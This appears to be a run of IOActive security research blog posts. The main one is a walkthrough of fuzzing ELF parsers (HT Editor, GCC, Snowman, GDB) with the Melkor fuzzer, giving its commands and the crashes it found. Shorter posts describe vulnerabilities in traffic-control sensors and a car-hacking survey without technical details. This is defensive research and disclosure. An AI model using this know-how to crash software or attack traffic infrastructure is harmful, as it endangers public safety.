Figure 3: Picture from OleumTech BreeZ 5 – Default Values (AES Encryption)

Since every hardware device should be unmounted from the field location for a manual update, what is the cost?

IOActive Labs hasn’t tested these firmware updates. We hope that OleumTech’s technical team performed testing to ensure that the firmware is properly securing radio communications.

I am proud that IOActive has one of the largest professional teams of information security researchers who work with ICS-CERT (DHS) in the world. In addition to identifying critical vulnerabilities and threats for power system facilities, the IOActive team provides security testing directly for control system manufacturers and businesses that have industrial facilities – proactively detecting weaknesses and anticipating exploits in order to improve the safety and operational integrity of technologies.

Needless to say, the companies that rely on vulnerable devices could lose much more than millions of dollars if these vulnerabilities are exploited. These flaws have the potential for massive economic and sociological impact, as well as loss of human life. On the other hand, some attacks are undetectable so it is possible that some of these devices already have been exploited in the wild. We may never know. Fortunately, customers now have a stronger security model and I expect that they now are motivated enough to get involved and ask the vulnerable vendors these open questions.

INSIGHTS | November 6, 2014

ELF Parsing Bugs by Example with Melkor Fuzzer

Too often the development community continues to blindly trust the metadata in Executable and Linking Format (ELF) files. In this paper, Alejandro Hernández walks you through the testing process for seven applications and reveals the bugs that he found. He performed the tests using Melkor, a file format fuzzer he wrote specifically for ELF files.

 

Introduction

The ELF file format, like any other file format, is an array of bits and bytes interconnected through data structures. When interpreted by an ELF parser, an ELF file makes sense, depending upon the parsing context: runtime (execution view) or static (linking view).

In 1999, ELF was chosen as the standard binary file format for *NIX systems, and now, about 15 years later, we are still in many instances blindly trusting the (meta)data within ELF files, either as executable binaries, shared libraries, or relocation objects.

However, blind trust is not necessary. Fuzzing tools are available to run proper safety checks for every single untrusted field.

To demonstrate, I tested and found bugs in seven applications using Melkor, a file format fuzzer specifically for ELF files that I developed: https://github.com/IOActive/Melkor_ELF_Fuzzer.

The following were tested:

  • HT Editor 2.1.0
  • GCC (GNU Compiler) 4.8.1
  • Snowman Decompiler v0.0.5
  • GDB (GNU Debugger) 7.8
  • IDA Pro (Demo version) 6.6.140625
  • OpenBSD 5.5 ldconfig
  • OpenBSD 5.5 Kernel

Most, if not all, of these bugs were reported to the vendors or developers.

Almost all, if not all, were only crashes (invalid memory dereferences) and I did not validate whether they’re exploitable security bugs. Therefore, please do not expect a working command execution exploit at the end of this white paper.

Melkor is an intuitive and, therefore, easy-to-use fuzzer. To get started, you simply identify:

  • The kind of metadata you want to fuzz
  • A valid ELF file to use as a template
  • The number of desired test cases you want to generate (malformed ELF files that I call ‘orcs,’ as shown in my Black Hat Arsenal presentation, slides 51 and 52.1
  • The likelihood of each fuzzing rule as a percentage

Options supported by Melkor:

For a quiet output, use the -q switch. 1. – Melkor Test of HT Editor 2.1.0

HT (http://hte.sourceforge.net) is my favorite ELF editor. It has parsers for all internal metadata.

Test Case Generation

To start, we’ll fuzz only the ELF header, with a 20% chance of executing each fuzzing rule, to create 1000 test cases:

$./melkor -H templates/foo -l 20 -n 1000

You will find the test cases that are generated in the orcs_foo directory along with a detailed report explaining what was fuzzed internally.

Fuzzing the Parser

You could perform manually testing by supplying each orc (test case) as a parameter to the HT Editor. However, it would take a long time to test 1000 test cases.

For that reason, Melkor comes with two testing scripts:

  • For Linux, test_fuzzed.sh
  • For Windows systems, win_test_fuzzed.bat

To test the scripts automatically, enter:

$./test_fuzzed.sh orcs_foo/ “ht”

Every time HT Editor opens a valid ELF file, you must press the [F10] key to continue to

the next test case. The Bug

After 22 tries, the test case orc_0023 crashed the HT Editor:

The next step is to identify the cause of the crash by reading the detailed report generated by Melkor:


By debugging it with GDB, you would see:

 

 

Effectively, there is a NULL pointer dereference  in the instruction mov (%rdi),%rax. 2. – Melkor Test of GCC (GNU Compiler) 4.8.1

I consider the GCC to be the compiler of excellence. When you type gcc foo.c -o foo, you’re performing all the phases (compilation, linking, etc.); however, if you want only to compile, the -c is necessary, as in gcc -c foo.c, to create the ELF relocatable object foo.o.

Normally, relocations and/or symbols tables are an important part of the .o objects. This is what we are going to fuzz.

 

Test Case Generation

Inside the templates/ folder, a foo.o file is compiled with the same Makefile to create Melkor, which in turn will be used as a template to create 5000 (default -n option) malformed relocatable files. We instruct Melkor to fuzz the relocations within the file (-R) and the symbol tables (-s) as well:

 

$./melkor -Rs templates/foo.o

 

During the fuzzing process, you may see verbose output:

 

 

Fuzzing the Parser


 

In order to test GCC with every malformed .o object, a command like gcc -o output malformed.o must be executed. To do so automatically, the following arguments are supplied to the testing script:

 

$./test_fuzzed.sh orcs_foo.o/ “gcc –o output”

 

You can observe how mature GCC is and how it properly handles every malformed struct, field, size, etc.:

 

 

 

 

The Bug

 

Normally, in a Linux system, when a program fails due to memory corruption or an invalid memory dereference, it writes to STDERR the message: “Segmentation fault.” As a quick way to identify if we found bugs in the linker, we can simply look for that message in the output of the testing script (the script already redirected the STDERR of each test case to STDOUT).

 

$./test_fuzzed.sh orcs_foo.o/ “gcc –o output” | egrep “Testing program|Segmentation fault”

 

 

 

 

Filtering for only those that ended with a “Segmentation fault,” I saw that 197 of 5000 test cases triggered a bug.

 

3. – Melkor Test of the Snowman Decompiler v0.0.5

 

 

 

 

Snowman (http://derevenets.com) is a great native code to C/C++ decompiler for Windows. It’s free and supports PE and ELF formats in x86 and x86-64 architectures.

 

 

Test Case Generation


In the previous example, I could have mentioned that after a period of testing, I noticed that some applications properly validated all fields in the initial header and handled the errors. So, in order to fuzz more internal levels, I implemented the following metadata dependencies in Melkor, which shouldn’t be broken:

 

 

 

 

 

With these dependencies, it’s possible to corrupt deeper metadata without corrupting structures in higher levels. In the previous GCC example, it’s evident that these dependencies were in place transparently to reach the third and fourth levels of metadata, symbol tables, and relocation tables respectively. For more about dependencies in Melkor, see Melkor Documentation: ELF Metadata Dependencies2.

 

Continuing with Snowman, I created only 200 test cases with fuzzed sections in the Section Header Table (SHT), without touching the ELF header, using the default likelihood of fuzzing rules execution, which is 10%:

 

 

$./melkor -S templates/foo -n 200

 

 

Fuzzing the Parser


 

Since snowman.exe runs on Windows machines, I then copied the created test cases to the Windows box where Snowman was loaded and tested each case using win_test_fuzzed.bat as follows:

 

C:Usersnitr0usDownloads>melkor-v1.0win_test_fuzzed.bat orcs_foo_SHT_snowman snowman-v0.0.5-win-x64snowman.exe

 

For every opened snowman.exe for which there is no exception, it’s necessary to close the window with the [Alt] + [F4] keyboard combination. Sorry for the inconvenience but I kept the testing scripts as simple as possible.

 

 

The Bug


 

I was lucky on testing day. The second orc triggered an unhandled exception that made Snowman fail:

 

 

 

4. – Melkor Test of GDB (GNU Debugger) 7.8

 

 

 

 

GDB, the most used debugger in *NIX systems, is another great piece of code.

When you type gdb foo, the necessary ELF data structures and other metadata is parsed and prepared before the debugging process; however, when you execute a program within GDB, some other metadata is parsed.

 

Test Case Generation

 

 

 

Most applications rely on the SHT to reach more internal metadata; the data and the code itself, etc. As you likely noticed in the previous example and as you’ll see now with GDB, malformed SHTs might crash many applications. So, I created 2000 orcs with fuzzed SHTs:

 

$./melkor -S templates/foo -n 2000

 

To see the other examples, GDB, IDA Pro, ldconfig and OpenBSD kernel, please continue reading the white paper at http://www.ioactive.com/pdfs/IOActive_ELF_Parsing_with_Melkor.pdf

 

Conclusion

 

 

 

Clearly, we would be in error if we assumed that ELF files, due to the age of the format, are free from parsing mistakes; common parsing mistakes are still found.

It would also be a mistake to assume that parsers are just in the OS kernels, readelf or objdump. Many new programs support 32 and 64-bit ELF files, and antivirus engines, debuggers, OS kernels, reverse engineering tools, and even malware may contain ELF parsers.

 

I hope you have seen from these examples that fuzzing is a very helpful method to identify functional (and security) bugs in your parsers in an automated fashion. An attacker could convert a single crash into an exploitable security bug in certain circumstances or those small crashes could be employed as anti-reversing or anti-infection techniques.

 

 

Feel free to fuzz, crash, fix, and/or report the bugs you find to make better software.

 

 

Happy fuzzing.

 

Alejandro Hernández  @nitr0usm

Extract from white paper at IOActive_ELF_Parsing_with_Melkor

 

 

Acknowledgments

IOActive, Inc.

 

References

[1]  Alejandro Hernández. “In the lands of corrupted elves: Breaking ELF software with Melkor fuzzer.”  <https://ioactive.com/wp-content/uploads/2014/11/us-14-Hernandez-Melkor-Slides.pdf>
[2] Melkor Documentation: ELF Metadata Dependencies and Fuzzing Rules. <https://github.com/IOActive/Melkor_ELF_Fuzzer/tree/master/docs>[3] IOActive Security Advisory: OpenBSD  5.5 Local Kernel Panic.<http://www.ioactive.com/pdfs/IOActive_Advisory_OpenBSD_5_5_Local_Kernel_Panic.pdf>

RESEARCH | August 14, 2014

Remote survey paper (car hacking)

Good Afternoon Interwebs,
Chris Valasek here. You may remember me from such nature films as “Earwigs: Eww”.
Charlie and I are finally getting around to publicly releasing our remote survey paper. I thought this went without saying but, to reiterate, we did NOT physically look at the cars that we discussed. The survey was designed as a high level overview of the information that we acquired from the mechanic’s sites for each manufacturer. The ‘Hackability’ is based upon our previous experience with automobiles, attack surface, and network structure.
Enjoy!
RESEARCH | July 31, 2014

Hacking Washington DC traffic control systems

This is a short blog post, because I’ve talked about this topic in the past. I want to let people know that I have the honor of presenting at DEF CON on Friday, August 8, 2014, at 1:00 PM. My presentation is entitled “Hacking US (and UK, Australia, France, Etc.) Traffic Control Systems”. I hope to see you all there. I’m sure you will like the presentation.

I am frustrated with Sensys Networks (vulnerable devices vendor) lack of cooperation, but I realize that I should be thankful. This has prompted me to further my research and try different things, like performing passive onsite tests on real deployments in cities like Seattle, New York, and Washington DC. I’m not so sure these cities are equally as thankful, since they have to deal with thousands of installed vulnerable devices, which are currently being used for critical traffic control.

The latest Sensys Networks numbers indicate that approximately 200,000 sensor devices are deployed worldwide. See http://www.trafficsystemsinc.com/newsletter/spring2014.html. Based on a unit cost of approximately $500, approximately $100,000,000 of vulnerable equipment is buried in roads around the world that anyone can hack. I’m also concerned about how much it will cost tax payers to fix and replace the equipment.

One way I confirmed that Sensys Networks devices were vulnerable was by traveling to Washington DC to observe a large deployment that I got to know.

When I exited the train station, the fun began.

INSIGHTS | April 30, 2014

Hacking US (and UK, Australia, France, etc.) Traffic Control Systems

Probably many of you have watched scenes from “Live Free or Die Hard” (Die Hard 4) where “terrorist hackers” manipulate traffic signals by just hitting Enter or typing a few keys. I wanted to do that! I started to look around, and while I couldn’t exactly do the same thing (too Hollywood style!), I got pretty close. I found some interesting devices used by traffic control systems in important US cities, and I could hack them 🙂 These devices are also used in cities in the UK, France, Australia, China, etc., making them even more interesting.
After getting the devices, it wasn’t difficult to find vulnerabilities (actually, it was more difficult to make them work properly, but that’s another story).

The vulnerabilities I found allow anyone to take complete control of the devices and send fake data to traffic control systems. Basically anyone could cause a traffic mess by launching an attack with a simple exploit programmed on cheap hardware ($100 or less).
I even tested the attack launched from a drone flying at over 650 feet, and it worked! Theoretically, an attack could be launched from up to 1 or 2 miles away with a better drone and hardware equipment, I just used a common, commercially available drone and cheap hardware. Since it seems flying a drone in the US is not illegal and anyone will be able to get drones on demand soon, I would be worried about attacks from the sky in the US.
It might also be possible to create self-replicating malware (worm) that can infect these vulnerable devices in order to launch attacks affecting traffic control systems later. The exploited device could then be used to compromise all of the same devices nearby.
 
What worries me the most is that if a vulnerable device is compromised, it’s really, really difficult and really, really costly to detect it. So there could already be compromised devices out there that no one knows about or could know about. 
 
Let me give you an idea of how affected some cities are. The following is from documentation from vulnerable vendors:
  • 250+ customers in 45 US states and 10 countries
  • Important US cities have deployments: New York, Washington DC, San Francisco, Los Angeles, Boston, Seattle, etc.
  • 50,000+ devices deployed worldwide (most of them in the US)
  • Countries include US, United Kingdom, China, Canada, Australia, France, etc. For instance, some UK cities with deployments: London, Shropshire, Slough, Bournemouth, Aberdeen, Blackburn with Darwen Borough Council, Belfast, etc. 
  • Australia has a big deployment on one of the most important and modern freeways.


As you can see, there are 50,000+ devices out there that could be hacked and cause traffic messes in many important cities.

Going onsite
I knew that the devices I have are vulnerable, but I wanted to be 100% sure that I wasn’t missing anything with my tests. Real-life deployments could have different configurations (different hardware/software versions)  

and it seemed that the vendor provided wrong information when I reported the vulnerabilities, so maybe what I found didn’t affect real-life deployments. I put my “tools” in my backpack and went to Seattle, New York, and Washington DC to do some “passive” onsite tests (“no hacking and nothing illegal” :)). Luckily, I could confirm that what I found applied to real-life deployments. BTW, many thanks to Ian Amit for the pictures and videos and for daring to go with me to DC :).

Vulnerabilities
As you may have already realized, I’m not going to share specific nor technical details here (for that, you will have to wait and go to Infiltrate 2014 in a couple of weeks. What I would like to mention is that the vendor was contacted a long time ago (September 2013) through ICS-CERT (the initial report to ICS-CERT was sent on July 31st, 2013). I was told by ICS-CERT that the vendor said that they didn’t think the issues were critical nor even important. For instance, regarding one of the vulnerabilities, the vendor said that since the devices were designed that way (insecure) on purpose, they were working as designed, and that customers (state/city governments) wanted the devices to work that way (insecure), so there wasn’t any security issue. Yes that was the answer, I couldn’t believe it. 
 
Regarding another vulnerability, the vendor said that it’s already fixed on newer versions of the device. But there is a big problem, you need to get a new device and replace the old one. This is not good news for state/city governments, since thousands of devices are already out there, and the time and money it would take to replace all of them is considerable. Meanwhile, the existing devices are vulnerable and open to attack.
 
Another excuse the vendor provided is that because the devices don’t control traffic lights, there is no need for security. This is crazy, because while the devices don’t directly control traffic control systems, they have a direct influence on the actions and decisions of these systems.
I tried several times to make ICS-CERT and the vendor understand that these issues were serious, but I couldn’t convince them. In the end I said, if the vendor doesn’t think they are vulnerable then OK, I’m done with this; I have tried hard, and I don’t want to continue wasting time and effort. Also, since DHS is aware of this (through ICS-CERT), and it seems that this is not critical nor important to them, then there isn’t anything else I can do except to go public.
 
This should be another wake up call for governments to evaluate the security of devices/products before using them in critical infrastructure, and also a request to providers of government devices/products to take security and security vulnerability reports seriously.
 
Impact
 
By exploiting the vulnerabilities I found, an attacker could cause traffic jams and problems at intersections, freeways, highways, etc. 
Electronic signs
It’s possible to make traffic lights (depending on the configuration) stay green more or less time, stay red and not change to green (I bet many of you have experienced something like this as a result of driving during non-traffic hours late at night or being on a bike or in a small car), or flash. It’s also possible to cause electronic signs to display incorrect speed limits and instructions and to make ramp meters allow cars on the freeway faster or slower than needed. 
 
These traffic problems could cause real issues, even deadly ones, by causing accidents or blocking ambulances, fire fighters, or police cars going to an emergency call.
I’m sure there are manual overrides and secondary controls in place that can be used if anomalies are detected and could mitigate possible attacks, and some traffic control systems won’t depend only on these vulnerable devices. This doesn’t mean that attacks are impossible or really complex; the possibility of a real attack shouldn’t be disregarded, since launching an attack is simple. The only thing that could be complex is making an attack have a bigger impact, but complex doesn’t mean impossible.
 

Traffic departments in states/cities with vulnerable devices deployed should pay special attention to traffic anomalies when there is no apparent reason and closely watch the device’s behavior.
 
“In 2012, there were an estimated 5,615,000 police-reported traffic crashes in which 33,561 people were killed and 2,362,000 people were injured; 3,950,000 crashes resulted in property damage only.” US DoT National Highway Traffic Safety Administration: Traffic Safety Facts
 
“Road crashes cost the U.S. $230.6 billion per year, or an average of $820 per person” Association for Safe International Road Travel: Annual US Road Crash Statistics
 
If you add malfunctioning traffic control systems to the above stats, the numbers could be a lot worse.